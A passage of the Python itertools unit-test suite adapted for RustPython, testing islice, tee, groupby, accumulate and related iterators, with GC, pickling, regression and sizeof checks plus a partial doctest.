self.assertRaises(ValueError, islice, ra, -5, 10, 1)
self.assertRaises(ValueError, islice, ra, 1, -5, -1)
self.assertRaises(ValueError, islice, ra, 1, 10, -1)
self.assertRaises(ValueError, islice, ra, 1, 10, 0)
self.assertRaises(ValueError, islice, ra, 'a')
self.assertRaises(ValueError, islice, ra, 'a', 1)
self.assertRaises(ValueError, islice, ra, 1, 'a')
self.assertRaises(ValueError, islice, ra, 'a', 1, 1)
self.assertRaises(ValueError, islice, ra, 1, 'a', 1)
self.assertEqual(len(list(islice(count(), 1, 10, maxsize))), 1)
# Issue #10323: Less islice in a predictable state
c = count()
self.assertEqual(list(islice(c, 1, 3, 50)), [1])
self.assertEqual(next(c), 3)
# check copy, deepcopy, pickle
for args in [ # islice(args) should agree with range(args)
(10, 20, 3),
(10, 3, 20),
(10, 20),
(10, 3),
(20,)
]:
self.assertEqual(list(copy.copy(islice(range(100), *args))),
list(range(*args)))
self.assertEqual(list(copy.deepcopy(islice(range(100), *args))),
list(range(*args)))
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
self.pickletest(proto, islice(range(100), *args))
# Issue #21321: check source iterator is not referenced
# from islice() after the latter has been exhausted
it = (x for x in (1, 2))
wr = weakref.ref(it)
it = islice(it, 1)
self.assertIsNotNone(wr())
list(it) # exhaust the iterator
support.gc_collect()
self.assertIsNone(wr())
# Issue #30537: islice can accept integer-like objects as
# arguments
class IntLike(object):
def __init__(self, val):
self.val = val
def __index__(self):
return self.val
self.assertEqual(list(islice(range(100), IntLike(10))), list(range(10)))
self.assertEqual(list(islice(range(100), IntLike(10), IntLike(50))),
list(range(10, 50)))
self.assertEqual(list(islice(range(100), IntLike(10), IntLike(50), IntLike(5))),
list(range(10,50,5)))
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_takewhile(self):
data = [1, 3, 5, 20, 2, 4, 6, 8]
self.assertEqual(list(takewhile(underten, data)), [1, 3, 5])
self.assertEqual(list(takewhile(underten, [])), [])
self.assertRaises(TypeError, takewhile)
self.assertRaises(TypeError, takewhile, operator.pow)
self.assertRaises(TypeError, takewhile, operator.pow, [(4,5)], 'extra')
self.assertRaises(TypeError, next, takewhile(10, [(4,5)]))
self.assertRaises(ValueError, next, takewhile(errfunc, [(4,5)]))
t = takewhile(bool, [1, 1, 1, 0, 0, 0])
self.assertEqual(list(t), [1, 1, 1])
self.assertRaises(StopIteration, next, t)
# check copy, deepcopy, pickle
self.assertEqual(list(copy.copy(takewhile(underten, data))), [1, 3, 5])
self.assertEqual(list(copy.deepcopy(takewhile(underten, data))),
[1, 3, 5])
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
self.pickletest(proto, takewhile(underten, data))
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_dropwhile(self):
data = [1, 3, 5, 20, 2, 4, 6, 8]
self.assertEqual(list(dropwhile(underten, data)), [20, 2, 4, 6, 8])
self.assertEqual(list(dropwhile(underten, [])), [])
self.assertRaises(TypeError, dropwhile)
self.assertRaises(TypeError, dropwhile, operator.pow)
self.assertRaises(TypeError, dropwhile, operator.pow, [(4,5)], 'extra')
self.assertRaises(TypeError, next, dropwhile(10, [(4,5)]))
self.assertRaises(ValueError, next, dropwhile(errfunc, [(4,5)]))
# check copy, deepcopy, pickle
self.assertEqual(list(copy.copy(dropwhile(underten, data))), [20, 2, 4, 6, 8])
self.assertEqual(list(copy.deepcopy(dropwhile(underten, data))),
[20, 2, 4, 6, 8])
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
self.pickletest(proto, dropwhile(underten, data))
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_tee(self):
n = 200
a, b = tee([]) # test empty iterator
self.assertEqual(list(a), [])
self.assertEqual(list(b), [])
a, b = tee(irange(n)) # test 100% interleaved
self.assertEqual(lzip(a,b), lzip(range(n), range(n)))
a, b = tee(irange(n)) # test 0% interleaved
self.assertEqual(list(a), list(range(n)))
self.assertEqual(list(b), list(range(n)))
a, b = tee(irange(n)) # test dealloc of leading iterator
for i in range(100):
self.assertEqual(next(a), i)
del a
self.assertEqual(list(b), list(range(n)))
a, b = tee(irange(n)) # test dealloc of trailing iterator
for i in range(100):
self.assertEqual(next(a), i)
del b
self.assertEqual(list(a), list(range(100, n)))
for j in range(5): # test randomly interleaved
order = [0]*n + [1]*n
random.shuffle(order)
lists = ([], [])
its = tee(irange(n))
for i in order:
value = next(its[i])
lists[i].append(value)
self.assertEqual(lists[0], list(range(n)))
self.assertEqual(lists[1], list(range(n)))
# test argument format checking
self.assertRaises(TypeError, tee)
self.assertRaises(TypeError, tee, 3)
self.assertRaises(TypeError, tee, [1,2], 'x')
self.assertRaises(TypeError, tee, [1,2], 3, 'x')
# tee object should be instantiable
a, b = tee('abc')
c = type(a)('def')
self.assertEqual(list(c), list('def'))
# test long-lagged and multi-way split
a, b, c = tee(range(2000), 3)
for i in range(100):
self.assertEqual(next(a), i)
self.assertEqual(list(b), list(range(2000)))
self.assertEqual([next(c), next(c)], list(range(2)))
self.assertEqual(list(a), list(range(100,2000)))
self.assertEqual(list(c), list(range(2,2000)))
# test values of n
self.assertRaises(TypeError, tee, 'abc', 'invalid')
self.assertRaises(ValueError, tee, [], -1)
for n in range(5):
result = tee('abc', n)
self.assertEqual(type(result), tuple)
self.assertEqual(len(result), n)
self.assertEqual([list(x) for x in result], [list('abc')]*n)
# tee pass-through to copyable iterator
a, b = tee('abc')
c, d = tee(a)
self.assertTrue(a is c)
# test tee_new
t1, t2 = tee('abc')
tnew = type(t1)
self.assertRaises(TypeError, tnew)
self.assertRaises(TypeError, tnew, 10)
t3 = tnew(t1)
self.assertTrue(list(t1) == list(t2) == list(t3) == list('abc'))
# test that tee objects are weak referencable
a, b = tee(range(10))
p = weakref.proxy(a)
self.assertEqual(getattr(p, '__class__'), type(b))
del a
self.assertRaises(ReferenceError, getattr, p, '__class__')
ans = list('abc')
long_ans = list(range(10000))
# check copy
a, b = tee('abc')
self.assertEqual(list(copy.copy(a)), ans)
self.assertEqual(list(copy.copy(b)), ans)
a, b = tee(list(range(10000)))
self.assertEqual(list(copy.copy(a)), long_ans)
self.assertEqual(list(copy.copy(b)), long_ans)
# check partially consumed copy
a, b = tee('abc')
take(2, a)
take(1, b)
self.assertEqual(list(copy.copy(a)), ans[2:])
self.assertEqual(list(copy.copy(b)), ans[1:])
self.assertEqual(list(a), ans[2:])
self.assertEqual(list(b), ans[1:])
a, b = tee(range(10000))
take(100, a)
take(60, b)
self.assertEqual(list(copy.copy(a)), long_ans[100:])
self.assertEqual(list(copy.copy(b)), long_ans[60:])
self.assertEqual(list(a), long_ans[100:])
self.assertEqual(list(b), long_ans[60:])
# check deepcopy
a, b = tee('abc')
self.assertEqual(list(copy.deepcopy(a)), ans)
self.assertEqual(list(copy.deepcopy(b)), ans)
self.assertEqual(list(a), ans)
self.assertEqual(list(b), ans)
a, b = tee(range(10000))
self.assertEqual(list(copy.deepcopy(a)), long_ans)
self.assertEqual(list(copy.deepcopy(b)), long_ans)
self.assertEqual(list(a), long_ans)
self.assertEqual(list(b), long_ans)
# check partially consumed deepcopy
a, b = tee('abc')
take(2, a)
take(1, b)
self.assertEqual(list(copy.deepcopy(a)), ans[2:])
self.assertEqual(list(copy.deepcopy(b)), ans[1:])
self.assertEqual(list(a), ans[2:])
self.assertEqual(list(b), ans[1:])
a, b = tee(range(10000))
take(100, a)
take(60, b)
self.assertEqual(list(copy.deepcopy(a)), long_ans[100:])
self.assertEqual(list(copy.deepcopy(b)), long_ans[60:])
self.assertEqual(list(a), long_ans[100:])
self.assertEqual(list(b), long_ans[60:])
# check pickle
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
self.pickletest(proto, iter(tee('abc')))
a, b = tee('abc')
self.pickletest(proto, a, compare=ans)
self.pickletest(proto, b, compare=ans)
# Issue 13454: Crash when deleting backward iterator from tee()
# TODO: RUSTPYTHON
@unittest.skip("hangs")
def test_tee_del_backward(self):
forward, backward = tee(repeat(None, 20000000))
try:
any(forward) # exhaust the iterator
del backward
except:
del forward, backward
raise
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_tee_reenter(self):
class I:
first = True
def __iter__(self):
return self
def __next__(self):
first = self.first
self.first = False
if first:
return next(b)
a, b = tee(I())
with self.assertRaisesRegex(RuntimeError, "tee"):
next(a)
# TODO: RUSTPYTHON - hangs
@unittest.skip("hangs")
def test_tee_concurrent(self):
start = threading.Event()
finish = threading.Event()
class I:
def __iter__(self):
return self
def __next__(self):
start.set()
finish.wait()
a, b = tee(I())
thread = threading.Thread(target=next, args=[a])
thread.start()
try:
start.wait()
with self.assertRaisesRegex(RuntimeError, "tee"):
next(b)
finally:
finish.set()
thread.join()
def test_StopIteration(self):
self.assertRaises(StopIteration, next, zip())
for f in (chain, cycle, zip, groupby):
self.assertRaises(StopIteration, next, f([]))
self.assertRaises(StopIteration, next, f(StopNow()))
self.assertRaises(StopIteration, next, islice([], None))
self.assertRaises(StopIteration, next, islice(StopNow(), None))
p, q = tee([])
self.assertRaises(StopIteration, next, p)
self.assertRaises(StopIteration, next, q)
p, q = tee(StopNow())
self.assertRaises(StopIteration, next, p)
self.assertRaises(StopIteration, next, q)
self.assertRaises(StopIteration, next, repeat(None, 0))
for f in (filter, filterfalse, map, takewhile, dropwhile, starmap):
self.assertRaises(StopIteration, next, f(lambda x:x, []))
self.assertRaises(StopIteration, next, f(lambda x:x, StopNow()))
class TestExamples(unittest.TestCase):
def test_accumulate(self):
self.assertEqual(list(accumulate([1,2,3,4,5])), [1, 3, 6, 10, 15])
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_accumulate_reducible(self):
# check copy, deepcopy, pickle
data = [1, 2, 3, 4, 5]
accumulated = [1, 3, 6, 10, 15]
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
it = accumulate(data)
self.assertEqual(list(pickle.loads(pickle.dumps(it, proto))), accumulated[:])
self.assertEqual(next(it), 1)
self.assertEqual(list(pickle.loads(pickle.dumps(it, proto))), accumulated[1:])
it = accumulate(data)
self.assertEqual(next(it), 1)
self.assertEqual(list(copy.deepcopy(it)), accumulated[1:])
self.assertEqual(list(copy.copy(it)), accumulated[1:])
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_accumulate_reducible_none(self):
# Issue #25718: total is None
it = accumulate([None, None, None], operator.is_)
self.assertEqual(next(it), None)
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
it_copy = pickle.loads(pickle.dumps(it, proto))
self.assertEqual(list(it_copy), [True, False])
self.assertEqual(list(copy.deepcopy(it)), [True, False])
self.assertEqual(list(copy.copy(it)), [True, False])
def test_chain(self):
self.assertEqual(''.join(chain('ABC', 'DEF')), 'ABCDEF')
def test_chain_from_iterable(self):
self.assertEqual(''.join(chain.from_iterable(['ABC', 'DEF'])), 'ABCDEF')
def test_combinations(self):
self.assertEqual(list(combinations('ABCD', 2)),
[('A','B'), ('A','C'), ('A','D'), ('B','C'), ('B','D'), ('C','D')])
self.assertEqual(list(combinations(range(4), 3)),
[(0,1,2), (0,1,3), (0,2,3), (1,2,3)])
def test_combinations_with_replacement(self):
self.assertEqual(list(combinations_with_replacement('ABC', 2)),
[('A','A'), ('A','B'), ('A','C'), ('B','B'), ('B','C'), ('C','C')])
def test_compress(self):
self.assertEqual(list(compress('ABCDEF', [1,0,1,0,1,1])), list('ACEF'))
def test_count(self):
self.assertEqual(list(islice(count(10), 5)), [10, 11, 12, 13, 14])
def test_cycle(self):
self.assertEqual(list(islice(cycle('ABCD'), 12)), list('ABCDABCDABCD'))
def test_dropwhile(self):
self.assertEqual(list(dropwhile(lambda x: x<5, [1,4,6,4,1])), [6,4,1])
def test_groupby(self):
self.assertEqual([k for k, g in groupby('AAAABBBCCDAABBB')],
list('ABCDAB'))
self.assertEqual([(list(g)) for k, g in groupby('AAAABBBCCD')],
[list('AAAA'), list('BBB'), list('CC'), list('D')])
def test_filter(self):
self.assertEqual(list(filter(lambda x: x%2, range(10))), [1,3,5,7,9])
def test_filterfalse(self):
self.assertEqual(list(filterfalse(lambda x: x%2, range(10))), [0,2,4,6,8])
def test_map(self):
self.assertEqual(list(map(pow, (2,3,10), (5,2,3))), [32, 9, 1000])
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_islice(self):
self.assertEqual(list(islice('ABCDEFG', 2)), list('AB'))
self.assertEqual(list(islice('ABCDEFG', 2, 4)), list('CD'))
self.assertEqual(list(islice('ABCDEFG', 2, None)), list('CDEFG'))
self.assertEqual(list(islice('ABCDEFG', 0, None, 2)), list('ACEG'))
def test_zip(self):
self.assertEqual(list(zip('ABCD', 'xy')), [('A', 'x'), ('B', 'y')])
def test_zip_longest(self):
self.assertEqual(list(zip_longest('ABCD', 'xy', fillvalue='-')),
[('A', 'x'), ('B', 'y'), ('C', '-'), ('D', '-')])
def test_permutations(self):
self.assertEqual(list(permutations('ABCD', 2)),
list(map(tuple, 'AB AC AD BA BC BD CA CB CD DA DB DC'.split())))
self.assertEqual(list(permutations(range(3))),
[(0,1,2), (0,2,1), (1,0,2), (1,2,0), (2,0,1), (2,1,0)])
def test_product(self):
self.assertEqual(list(product('ABCD', 'xy')),
list(map(tuple, 'Ax Ay Bx By Cx Cy Dx Dy'.split())))
self.assertEqual(list(product(range(2), repeat=3)),
[(0,0,0), (0,0,1), (0,1,0), (0,1,1),
(1,0,0), (1,0,1), (1,1,0), (1,1,1)])
def test_repeat(self):
self.assertEqual(list(repeat(10, 3)), [10, 10, 10])
def test_stapmap(self):
self.assertEqual(list(starmap(pow, [(2,5), (3,2), (10,3)])),
[32, 9, 1000])
def test_takewhile(self):
self.assertEqual(list(takewhile(lambda x: x<5, [1,4,6,4,1])), [1,4])
class TestPurePythonRoughEquivalents(unittest.TestCase):
@staticmethod
def islice(iterable, *args):
s = slice(*args)
start, stop, step = s.start or 0, s.stop or sys.maxsize, s.step or 1
it = iter(range(start, stop, step))
try:
nexti = next(it)
except StopIteration:
# Consume *iterable* up to the *start* position.
for i, element in zip(range(start), iterable):
pass
return
try:
for i, element in enumerate(iterable):
if i == nexti:
yield element
nexti = next(it)
except StopIteration:
# Consume to *stop*.
for i, element in zip(range(i + 1, stop), iterable):
pass
def test_islice_recipe(self):
self.assertEqual(list(self.islice('ABCDEFG', 2)), list('AB'))
self.assertEqual(list(self.islice('ABCDEFG', 2, 4)), list('CD'))
self.assertEqual(list(self.islice('ABCDEFG', 2, None)), list('CDEFG'))
self.assertEqual(list(self.islice('ABCDEFG', 0, None, 2)), list('ACEG'))
# Test items consumed.
it = iter(range(10))
self.assertEqual(list(self.islice(it, 3)), list(range(3)))
self.assertEqual(list(it), list(range(3, 10)))
it = iter(range(10))
self.assertEqual(list(self.islice(it, 3, 3)), [])
self.assertEqual(list(it), list(range(3, 10)))
# Test that slice finishes in predictable state.
c = count()
self.assertEqual(list(self.islice(c, 1, 3, 50)), [1])
self.assertEqual(next(c), 3)
class TestGC(unittest.TestCase):
def makecycle(self, iterator, container):
container.append(iterator)
next(iterator)
del container, iterator
def test_accumulate(self):
a = []
self.makecycle(accumulate([1,2,a,3]), a)
def test_chain(self):
a = []
self.makecycle(chain(a), a)
def test_chain_from_iterable(self):
a = []
self.makecycle(chain.from_iterable([a]), a)
def test_combinations(self):
a = []
self.makecycle(combinations([1,2,a,3], 3), a)
def test_combinations_with_replacement(self):
a = []
self.makecycle(combinations_with_replacement([1,2,a,3], 3), a)
def test_compress(self):
a = []
self.makecycle(compress('ABCDEF', [1,0,1,0,1,0]), a)
def test_count(self):
a = []
Int = type('Int', (int,), dict(x=a))
self.makecycle(count(Int(0), Int(1)), a)
def test_cycle(self):
a = []
self.makecycle(cycle([a]*2), a)
def test_dropwhile(self):
a = []
self.makecycle(dropwhile(bool, [0, a, a]), a)
def test_groupby(self):
a = []
self.makecycle(groupby([a]*2, lambda x:x), a)
def test_issue2246(self):
# Issue 2246 -- the _grouper iterator was not included in GC
n = 10
keyfunc = lambda x: x
for i, j in groupby(range(n), key=keyfunc):
keyfunc.__dict__.setdefault('x',[]).append(j)
def test_filter(self):
a = []
self.makecycle(filter(lambda x:True, [a]*2), a)
def test_filterfalse(self):
a = []
self.makecycle(filterfalse(lambda x:False, a), a)
def test_zip(self):
a = []
self.makecycle(zip([a]*2, [a]*3), a)
def test_zip_longest(self):
a = []
self.makecycle(zip_longest([a]*2, [a]*3), a)
b = [a, None]
self.makecycle(zip_longest([a]*2, [a]*3, fillvalue=b), a)
def test_map(self):
a = []
self.makecycle(map(lambda x:x, [a]*2), a)
def test_islice(self):
a = []
self.makecycle(islice([a]*2, None), a)
def test_permutations(self):
a = []
self.makecycle(permutations([1,2,a,3], 3), a)
def test_product(self):
a = []
self.makecycle(product([1,2,a,3], repeat=3), a)
def test_repeat(self):
a = []
self.makecycle(repeat(a), a)
def test_starmap(self):
a = []
self.makecycle(starmap(lambda *t: t, [(a,a)]*2), a)
def test_takewhile(self):
a = []
self.makecycle(takewhile(bool, [1, 0, a, a]), a)
def R(seqn):
'Regular generator'
for i in seqn:
yield i
class G:
'Sequence using __getitem__'
def __init__(self, seqn):
self.seqn = seqn
def __getitem__(self, i):
return self.seqn[i]
class I:
'Sequence using iterator protocol'
def __init__(self, seqn):
self.seqn = seqn
self.i = 0
def __iter__(self):
return self
def __next__(self):
if self.i >= len(self.seqn): raise StopIteration
v = self.seqn[self.i]
self.i += 1
return v
class Ig:
'Sequence using iterator protocol defined with a generator'
def __init__(self, seqn):
self.seqn = seqn
self.i = 0
def __iter__(self):
for val in self.seqn:
yield val
class X:
'Missing __getitem__ and __iter__'
def __init__(self, seqn):
self.seqn = seqn
self.i = 0
def __next__(self):
if self.i >= len(self.seqn): raise StopIteration
v = self.seqn[self.i]
self.i += 1
return v
class N:
'Iterator missing __next__()'
def __init__(self, seqn):
self.seqn = seqn
self.i = 0
def __iter__(self):
return self
class E:
'Test propagation of exceptions'
def __init__(self, seqn):
self.seqn = seqn
self.i = 0
def __iter__(self):
return self
def __next__(self):
3 // 0
class S:
'Test immediate stop'
def __init__(self, seqn):
pass
def __iter__(self):
return self
def __next__(self):
raise StopIteration
def L(seqn):
'Test multiple tiers of iterators'
return chain(map(lambda x:x, R(Ig(G(seqn)))))
class TestVariousIteratorArgs(unittest.TestCase):
def test_accumulate(self):
s = [1,2,3,4,5]
r = [1,3,6,10,15]
n = len(s)
for g in (G, I, Ig, L, R):
self.assertEqual(list(accumulate(g(s))), r)
self.assertEqual(list(accumulate(S(s))), [])
self.assertRaises(TypeError, accumulate, X(s))
self.assertRaises(TypeError, accumulate, N(s))
self.assertRaises(ZeroDivisionError, list, accumulate(E(s)))
def test_chain(self):
for s in ("123", "", range(1000), ('do', 1.2), range(2000,2200,5)):
for g in (G, I, Ig, S, L, R):
self.assertEqual(list(chain(g(s))), list(g(s)))
self.assertEqual(list(chain(g(s), g(s))), list(g(s))+list(g(s)))
self.assertRaises(TypeError, list, chain(X(s)))
self.assertRaises(TypeError, list, chain(N(s)))
self.assertRaises(ZeroDivisionError, list, chain(E(s)))
def test_compress(self):
for s in ("123", "", range(1000), ('do', 1.2), range(2000,2200,5)):
n = len(s)
for g in (G, I, Ig, S, L, R):
self.assertEqual(list(compress(g(s), repeat(1))), list(g(s)))
self.assertRaises(TypeError, compress, X(s), repeat(1))
self.assertRaises(TypeError, compress, N(s), repeat(1))
self.assertRaises(ZeroDivisionError, list, compress(E(s), repeat(1)))
def test_product(self):
for s in ("123", "", range(1000), ('do', 1.2), range(2000,2200,5)):
self.assertRaises(TypeError, product, X(s))
self.assertRaises(TypeError, product, N(s))
self.assertRaises(ZeroDivisionError, product, E(s))
def test_cycle(self):
for s in ("123", "", range(1000), ('do', 1.2), range(2000,2200,5)):
for g in (G, I, Ig, S, L, R):
tgtlen = len(s) * 3
expected = list(g(s))*3
actual = list(islice(cycle(g(s)), tgtlen))
self.assertEqual(actual, expected)
self.assertRaises(TypeError, cycle, X(s))
self.assertRaises(TypeError, cycle, N(s))
self.assertRaises(ZeroDivisionError, list, cycle(E(s)))
def test_groupby(self):
for s in (range(10), range(0), range(1000), (7,11), range(2000,2200,5)):
for g in (G, I, Ig, S, L, R):
self.assertEqual([k for k, sb in groupby(g(s))], list(g(s)))
self.assertRaises(TypeError, groupby, X(s))
self.assertRaises(TypeError, groupby, N(s))
self.assertRaises(ZeroDivisionError, list, groupby(E(s)))
def test_filter(self):
for s in (range(10), range(0), range(1000), (7,11), range(2000,2200,5)):
for g in (G, I, Ig, S, L, R):
self.assertEqual(list(filter(isEven, g(s))),
[x for x in g(s) if isEven(x)])
self.assertRaises(TypeError, filter, isEven, X(s))
self.assertRaises(TypeError, filter, isEven, N(s))
self.assertRaises(ZeroDivisionError, list, filter(isEven, E(s)))
def test_filterfalse(self):
for s in (range(10), range(0), range(1000), (7,11), range(2000,2200,5)):
for g in (G, I, Ig, S, L, R):
self.assertEqual(list(filterfalse(isEven, g(s))),
[x for x in g(s) if isOdd(x)])
self.assertRaises(TypeError, filterfalse, isEven, X(s))
self.assertRaises(TypeError, filterfalse, isEven, N(s))
self.assertRaises(ZeroDivisionError, list, filterfalse(isEven, E(s)))
def test_zip(self):
for s in ("123", "", range(1000), ('do', 1.2), range(2000,2200,5)):
for g in (G, I, Ig, S, L, R):
self.assertEqual(list(zip(g(s))), lzip(g(s)))
self.assertEqual(list(zip(g(s), g(s))), lzip(g(s), g(s)))
self.assertRaises(TypeError, zip, X(s))
self.assertRaises(TypeError, zip, N(s))
self.assertRaises(ZeroDivisionError, list, zip(E(s)))
def test_ziplongest(self):
for s in ("123", "", range(1000), ('do', 1.2), range(2000,2200,5)):
for g in (G, I, Ig, S, L, R):
self.assertEqual(list(zip_longest(g(s))), list(zip(g(s))))
self.assertEqual(list(zip_longest(g(s), g(s))), list(zip(g(s), g(s))))
self.assertRaises(TypeError, zip_longest, X(s))
self.assertRaises(TypeError, zip_longest, N(s))
self.assertRaises(ZeroDivisionError, list, zip_longest(E(s)))
def test_map(self):
for s in (range(10), range(0), range(100), (7,11), range(20,50,5)):
for g in (G, I, Ig, S, L, R):
self.assertEqual(list(map(onearg, g(s))),
[onearg(x) for x in g(s)])
self.assertEqual(list(map(operator.pow, g(s), g(s))),
[x**x for x in g(s)])
self.assertRaises(TypeError, map, onearg, X(s))
self.assertRaises(TypeError, map, onearg, N(s))
self.assertRaises(ZeroDivisionError, list, map(onearg, E(s)))
def test_islice(self):
for s in ("12345", "", range(1000), ('do', 1.2), range(2000,2200,5)):
for g in (G, I, Ig, S, L, R):
self.assertEqual(list(islice(g(s),1,None,2)), list(g(s))[1::2])
self.assertRaises(TypeError, islice, X(s), 10)
self.assertRaises(TypeError, islice, N(s), 10)
self.assertRaises(ZeroDivisionError, list, islice(E(s), 10))
def test_starmap(self):
for s in (range(10), range(0), range(100), (7,11), range(20,50,5)):
for g in (G, I, Ig, S, L, R):
ss = lzip(s, s)
self.assertEqual(list(starmap(operator.pow, g(ss))),
[x**x for x in g(s)])
self.assertRaises(TypeError, starmap, operator.pow, X(ss))
self.assertRaises(TypeError, starmap, operator.pow, N(ss))
self.assertRaises(ZeroDivisionError, list, starmap(operator.pow, E(ss)))
def test_takewhile(self):
for s in (range(10), range(0), range(1000), (7,11), range(2000,2200,5)):
for g in (G, I, Ig, S, L, R):
tgt = []
for elem in g(s):
if not isEven(elem): break
tgt.append(elem)
self.assertEqual(list(takewhile(isEven, g(s))), tgt)
self.assertRaises(TypeError, takewhile, isEven, X(s))
self.assertRaises(TypeError, takewhile, isEven, N(s))
self.assertRaises(ZeroDivisionError, list, takewhile(isEven, E(s)))
def test_dropwhile(self):
for s in (range(10), range(0), range(1000), (7,11), range(2000,2200,5)):
for g in (G, I, Ig, S, L, R):
tgt = []
for elem in g(s):
if not tgt and isOdd(elem): continue
tgt.append(elem)
self.assertEqual(list(dropwhile(isOdd, g(s))), tgt)
self.assertRaises(TypeError, dropwhile, isOdd, X(s))
self.assertRaises(TypeError, dropwhile, isOdd, N(s))
self.assertRaises(ZeroDivisionError, list, dropwhile(isOdd, E(s)))
def test_tee(self):
for s in ("123", "", range(1000), ('do', 1.2), range(2000,2200,5)):
for g in (G, I, Ig, S, L, R):
it1, it2 = tee(g(s))
self.assertEqual(list(it1), list(g(s)))
self.assertEqual(list(it2), list(g(s)))
self.assertRaises(TypeError, tee, X(s))
self.assertRaises(TypeError, tee, N(s))
self.assertRaises(ZeroDivisionError, list, tee(E(s))[0])
class LengthTransparency(unittest.TestCase):
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_repeat(self):
self.assertEqual(operator.length_hint(repeat(None, 50)), 50)
self.assertEqual(operator.length_hint(repeat(None, 0)), 0)
self.assertEqual(operator.length_hint(repeat(None), 12), 12)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_repeat_with_negative_times(self):
self.assertEqual(operator.length_hint(repeat(None, -1)), 0)
self.assertEqual(operator.length_hint(repeat(None, -2)), 0)
self.assertEqual(operator.length_hint(repeat(None, times=-1)), 0)
self.assertEqual(operator.length_hint(repeat(None, times=-2)), 0)
class RegressionTests(unittest.TestCase):
def test_sf_793826(self):
# Fix Armin Rigo's successful efforts to wreak havoc
def mutatingtuple(tuple1, f, tuple2):
# this builds a tuple t which is a copy of tuple1,
# then calls f(t), then mutates t to be equal to tuple2
# (needs len(tuple1) == len(tuple2)).
def g(value, first=[1]):
if first:
del first[:]
f(next(z))
return value
items = list(tuple2)
items[1:1] = list(tuple1)
gen = map(g, items)
z = zip(*[gen]*len(tuple1))
next(z)
def f(t):
global T
T = t
first[:] = list(T)
first = []
mutatingtuple((1,2,3), f, (4,5,6))
second = list(T)
self.assertEqual(first, second)
def test_sf_950057(self):
# Make sure that chain() and cycle() catch exceptions immediately
# rather than when shifting between input sources
def gen1():
hist.append(0)
yield 1
hist.append(1)
raise AssertionError
hist.append(2)
def gen2(x):
hist.append(3)
yield 2
hist.append(4)
hist = []
self.assertRaises(AssertionError, list, chain(gen1(), gen2(False)))
self.assertEqual(hist, [0,1])
hist = []
self.assertRaises(AssertionError, list, chain(gen1(), gen2(True)))
self.assertEqual(hist, [0,1])
hist = []
self.assertRaises(AssertionError, list, cycle(gen1()))
self.assertEqual(hist, [0,1])
@support.skip_if_pgo_task
def test_long_chain_of_empty_iterables(self):
# Make sure itertools.chain doesn't run into recursion limits when
# dealing with long chains of empty iterables. Even with a high
# number this would probably only fail in Py_DEBUG mode.
it = chain.from_iterable(() for unused in range(10000000))
with self.assertRaises(StopIteration):
next(it)
def test_issue30347_1(self):
def f(n):
if n == 5:
list(b)
return n != 6
for (k, b) in groupby(range(10), f):
list(b) # shouldn't crash
def test_issue30347_2(self):
class K:
def __init__(self, v):
pass
def __eq__(self, other):
nonlocal i
i += 1
if i == 1:
next(g, None)
return True
i = 0
g = next(groupby(range(10), K))[1]
for j in range(2):
next(g, None) # shouldn't crash
class SubclassWithKwargsTest(unittest.TestCase):
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_keywords_in_subclass(self):
# count is not subclassable...
for cls in (repeat, zip, filter, filterfalse, chain, map,
starmap, islice, takewhile, dropwhile, cycle, compress):
class Subclass(cls):
def __init__(self, newarg=None, *args):
cls.__init__(self, *args)
try:
Subclass(newarg=1)
except TypeError as err:
# we expect type errors because of wrong argument count
self.assertNotIn("keyword arguments", err.args[0])
@support.cpython_only
class SizeofTest(unittest.TestCase):
def setUp(self):
self.ssize_t = struct.calcsize('n')
check_sizeof = support.check_sizeof
def test_product_sizeof(self):
basesize = support.calcobjsize('3Pi')
check = self.check_sizeof
check(product('ab', '12'), basesize + 2 * self.ssize_t)
check(product(*(('abc',) * 10)), basesize + 10 * self.ssize_t)
def test_combinations_sizeof(self):
basesize = support.calcobjsize('3Pni')
check = self.check_sizeof
check(combinations('abcd', 3), basesize + 3 * self.ssize_t)
check(combinations(range(10), 4), basesize + 4 * self.ssize_t)
def test_combinations_with_replacement_sizeof(self):
cwr = combinations_with_replacement
basesize = support.calcobjsize('3Pni')
check = self.check_sizeof
check(cwr('abcd', 3), basesize + 3 * self.ssize_t)
check(cwr(range(10), 4), basesize + 4 * self.ssize_t)
def test_permutations_sizeof(self):
basesize = support.calcobjsize('4Pni')
check = self.check_sizeof
check(permutations('abcd'),
basesize + 4 * self.ssize_t + 4 * self.ssize_t)
check(permutations('abcd', 3),
basesize + 4 * self.ssize_t + 3 * self.ssize_t)
check(permutations('abcde', 3),
basesize + 5 * self.ssize_t + 3 * self.ssize_t)
check(permutations(range(10), 4),
basesize + 10 * self.ssize_t + 4 * self.ssize_t)
libreftest = """ Doctest for examples in the library reference: libitertools.tex
>>> amounts = [120.15, 764.05, 823.14]
>>> for checknum, amount in zip(count(1200), amounts):
... print('Check %d is for $%.2f' % (checknum, amount))
...
Check 1200 is for $120.15
Check 1201 is for $764.05
Check 1202 is for $823.14
>>> import operator
>>> for cube in map(operator.pow, range(1,4), repeat(3)):
... print(cube)
...
1
8
27
>>> reportlines = ['EuroPython', 'Roster', '', 'alex', '', 'laura', '', 'martin', '', 'walter', '', 'samuele']
>>> for name in islice(reportlines, 3, None, 2):
... print(name.title())
...
Alex
Laura
Martin
Walter
Samuele
>>> from operator import itemgetter
>>> d = dict(a=1, b=2, c=1, d=2, e=1, f=2, g=3)
>>> di = sorted(sorted(d.items()), key=itemgetter(1))
>>> for k, g in groupby(di, itemgetter(1)):
... print(k, list(map(itemgetter(0), g)))
...
1 ['a', 'c', 'e']
2 ['b', 'd', 'f']
3 ['g']
# Find runs of consecutive numbers using groupby. The key to the solution
# is differencing with a range so that consecutive numbers all appear in
# same group.
>>> data = [ 1, 4,5,6, 10, 15,16,17,18, 22, 25,26,27,28]
>>> for k, g in groupby(enumerate(data), lambda t:t[0]-t[1]):
